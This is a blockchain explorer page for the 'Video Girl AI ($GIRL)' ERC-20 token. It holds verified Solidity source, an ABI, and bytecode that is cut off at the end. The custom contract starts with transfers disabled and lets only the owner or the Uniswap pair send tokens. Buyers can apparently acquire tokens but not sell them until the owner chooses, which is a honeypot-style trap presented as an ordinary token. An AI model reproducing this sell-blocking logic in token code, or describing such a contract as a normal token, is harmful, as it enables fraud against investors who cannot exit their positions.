ETH Price: $2,724.17 (+0.60%)

Token

Video Girl AI ($GIRL)
 

Overview

Max Total Supply

1,000,000 $GIRL

Holders

4

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
63,273.465761248968712318 $GIRL

Value
$0.00
0x17b9544521cfb1d454c6ff7607bcf773dcc830fb
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
VideoGirlAI

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-30
*/

// SPDX-License-Identifier: UNLICENSED

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

// File: contracts/VideoGirlAi.sol


pragma solidity ^0.8.0;



contract VideoGirlAI is ERC20, Ownable {
    address public uniswapV2Pair;
    bool public transferEnabled;

    constructor() ERC20("Video Girl AI", "$GIRL") {
        transferEnabled = false;
        _mint(msg.sender, 1000000 * 10 ** decimals());
    }

    function enableTransfer() public onlyOwner {
        transferEnabled = true;
    }

    function disableTransfer() public onlyOwner {
        transferEnabled = false;
    }

    function setUniswapV2Pair(address newUniswapV2Pair) public onlyOwner {
        uniswapV2Pair = newUniswapV2Pair;
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        require(
            transferEnabled || isTransferAllowed(msg.sender, recipient),
            "Token transfers are currently disabled for this address."
        );
        return super.transfer(recipient, amount);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        require(
            transferEnabled || isTransferAllowed(sender, recipient),
            "Token transfers are currently disabled for this address."
        );
        return super.transferFrom(sender, recipient, amount);
    }

    function isTransferAllowed(address sender, address recipient) private view returns (bool) {
        return (
            sender == owner() ||
            sender == uniswapV2Pair ||
            (recipient == owner() && sender == uniswapV2Pair)
        );
    }

    function _beforeTokenTransfer(address from, address to, uint256 amount) internal override {
        require(
            transferEnabled || isTransferAllowed(from, to),
            "Token transfers are currently disabled for this address."
        );
        super._beforeTokenTransfer(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newUniswapV2Pair","type":"address"}],"name":"setUniswapV2Pair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600d81526020016c566964656f204769726c20414960981b815250604051806040016040528060058152602001640911d2549360da1b8152508160039081620000679190620003cb565b506004620000768282620003cb565b505050620000936200008d620000ce60201b60201c565b620000d2565b6006805460ff60a01b19169055620000c833620000b36012600a620005aa565b620000c290620f4240620005bb565b62000124565b620005eb565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620001805760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6200018e60008383620001f9565b8060026000828254620001a29190620005d5565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b600654600160a01b900460ff1680620002195750620002198383620002aa565b6200028d5760405162461bcd60e51b815260206004820152603860248201527f546f6b656e207472616e7366657273206172652063757272656e746c7920646960448201527f7361626c656420666f72207468697320616464726573732e0000000000000000606482015260840162000177565b620002a5838383620002a560201b620005c61760201c565b505050565b6000620002bf6005546001600160a01b031690565b6001600160a01b0316836001600160a01b03161480620002ec57506006546001600160a01b038481169116145b806200031e57506005546001600160a01b0383811691161480156200031e57506006546001600160a01b038481169116145b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200035257607f821691505b6020821081036200037357634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620002a557600081815260208120601f850160051c81016020861015620003a25750805b601f850160051c820191505b81811015620003c357828155600101620003ae565b505050505050565b81516001600160401b03811115620003e757620003e762000327565b620003ff81620003f884546200033d565b8462000379565b602080601f8311600181146200043757600084156200041e5750858301515b600019600386901b1c1916600185901b178555620003c3565b600085815260208120601f198616915b82811015620004685788860151825594840194600190910190840162000447565b5085821015620004875787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004ee578160001904821115620004d257620004d262000497565b80851615620004e057918102915b93841c9390800290620004b2565b509250929050565b600082620005075750600162000321565b81620005165750600062000321565b81600181146200052f57600281146200053a576200055a565b600191505062000321565b60ff8411156200054e576200054e62000497565b50506001821b62000321565b5060208310610133831016604e8410600b84101617156200057f575081810a62000321565b6200058b8383620004ad565b8060001904821115620005a257620005a262000497565b029392505050565b60006200031e60ff841683620004f6565b808202811582820484141762000321576200032162000497565b8082018082111562000321576200032162000497565b610ca780620005fb6000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb1461025f578063b187984f14610272578063dd62ed3e1461027a578063f1b50c1d1461028d578063f2fde38b1461029557600080fd5b8063715018a6146102165780638da5cb5b1461022057806395d89b4114610231578063a29a608914610239578063a457c2d71461024c57600080fd5b8063313ce567116100f4578063313ce5671461018c578063395093511461019b57806349bd5a5e146101ae5780634cd412d5146101d957806370a08231146101ed57600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd1461016757806323b872dd14610179575b600080fd5b61012e6102a8565b60405161013b9190610a9b565b60405180910390f35b610157610152366004610b05565b61033a565b604051901515815260200161013b565b6002545b60405190815260200161013b565b610157610187366004610b2f565b610354565b6040516012815260200161013b565b6101576101a9366004610b05565b6103ac565b6006546101c1906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b60065461015790600160a01b900460ff1681565b61016b6101fb366004610b6b565b6001600160a01b031660009081526020819052604090205490565b61021e6103ce565b005b6005546001600160a01b03166101c1565b61012e6103e2565b61021e610247366004610b6b565b6103f1565b61015761025a366004610b05565b61041b565b61015761026d366004610b05565b6104a1565b61021e6104ee565b61016b610288366004610b86565b610505565b61021e610530565b61021e6102a3366004610b6b565b61054d565b6060600380546102b790610bb9565b80601f01602080910402602001604051908101604052809291908181526020018280546102e390610bb9565b80156103305780601f1061030557610100808354040283529160200191610330565b820191906000526020600020905b81548152906001019060200180831161031357829003601f168201915b5050505050905090565b6000336103488185856105cb565b60019150505b92915050565b600654600090600160a01b900460ff1680610374575061037484846106ef565b6103995760405162461bcd60e51b815260040161039090610bf3565b60405180910390fd5b6103a4848484610766565b949350505050565b6000336103488185856103bf8383610505565b6103c99190610c50565b6105cb565b6103d661077f565b6103e060006107d9565b565b6060600480546102b790610bb9565b6103f961077f565b600680546001600160a01b0319166001600160a01b0392909216919091179055565b600033816104298286610505565b9050838110156104895760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610390565b61049682868684036105cb565b506001949350505050565b600654600090600160a01b900460ff16806104c157506104c133846106ef565b6104dd5760405162461bcd60e51b815260040161039090610bf3565b6104e7838361082b565b9392505050565b6104f661077f565b6006805460ff60a01b19169055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61053861077f565b6006805460ff60a01b1916600160a01b179055565b61055561077f565b6001600160a01b0381166105ba5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610390565b6105c3816107d9565b50565b505050565b6001600160a01b03831661062d5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610390565b6001600160a01b03821661068e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610390565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107036005546001600160a01b031690565b6001600160a01b0316836001600160a01b0316148061072f57506006546001600160a01b038481169116145b806104e757506005546001600160a01b0383811691161480156104e757506006546001600160a01b03848116911614905092915050565b600033610774858285610839565b6104968585856108b3565b6005546001600160a01b031633146103e05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6000336103488185856108b3565b60006108458484610505565b905060001981146108ad57818110156108a05760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610390565b6108ad84848484036105cb565b50505050565b6001600160a01b0383166109175760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610390565b6001600160a01b0382166109795760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610390565b610984838383610a62565b6001600160a01b038316600090815260208190526040902054818110156109fc5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610390565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36108ad565b600654600160a01b900460ff1680610a7f5750610a7f83836106ef565b6105c65760405162461bcd60e51b815260040161039090610bf3565b600060208083528351808285015260005b81811015610ac857858101830151858201604001528201610aac565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0057600080fd5b919050565b60008060408385031215610b1857600080fd5b610b2183610ae9565b946020939093013593505050565b600080600060608486031215610b4457600080fd5b610b4d84610ae9565b9250610b5b60208501610ae9565b9150604084013590509250925092565b600060208284031215610b7d57600080fd5b6104e782610ae9565b60008060408385031215610b9957600080fd5b610ba283610ae9565b9150610bb060208401610ae9565b90509250929050565b600181811c90821680610bcd57607f821691505b602082108103610bed57634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526038908201527f546f6b656e207472616e7366657273206172652063757272656e746c7920646960408201527f7361626c656420666f72207468697320616464726573732e0000000000000000606082015260800190565b8082018082111561034e57634e487b7160e01b600052601160045260246000fdfea264697066735822122040ba7650f7cbc13f1c261c8b5171d206aba869111d79de7ec78b7f7f0db4b44064736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb1461025f578063b187984f14610272578063dd62ed3e1461027a578063f1b50c1d1461028d578063f2fde38b1461029557600080fd5b8063715018a6146102165780638da5cb5b1461022057806395d89b4114610231578063a29a608914610239578063a457c2d71461024c57600080fd5b8063313ce567116100f4578063313ce5671461018c578063395093511461019b57806349bd5a5e146101ae5780634cd412d5146101d957806370a08231146101ed57600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd1461016757806323b872dd14610179575b600080fd5b61012e6102a8565b60405161013b9190610a9b565b60405180910390f35b610157610152366004610b05565b61033a565b604051901515815260200161013b565b6002545b60405190815260200161013b565b610157610187366004610b2f565b610354565b6040516012815260200161013b565b6101576101a9366004610b05565b6103ac565b6006546101c1906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b60065461015790600160a01b900460ff1681565b61016b6101fb366004610b6b565b6001600160a01b031660009081526020819052604090205490565b61021e6103ce565b005b6005546001600160a01b03166101c1565b61012e6103e2565b61021e610247366004610b6b565b6103f1565b61015761025a366004610b05565b61041b565b61015761026d366004610b05565b6104a1565b61021e6104ee565b61016b610288366004610b86565b610505565b61021e610530565b61021e6102a3366004610b6b565b61054d565b6060600380546102b790610bb9565b80601f01602080910402602001604051908101604052809291908181526020018280546102e390610bb9565b80156103305780601f1061030557610100808354040283529160200191610330565b820191906000526020600020905b8154815290600101906020018083116103135782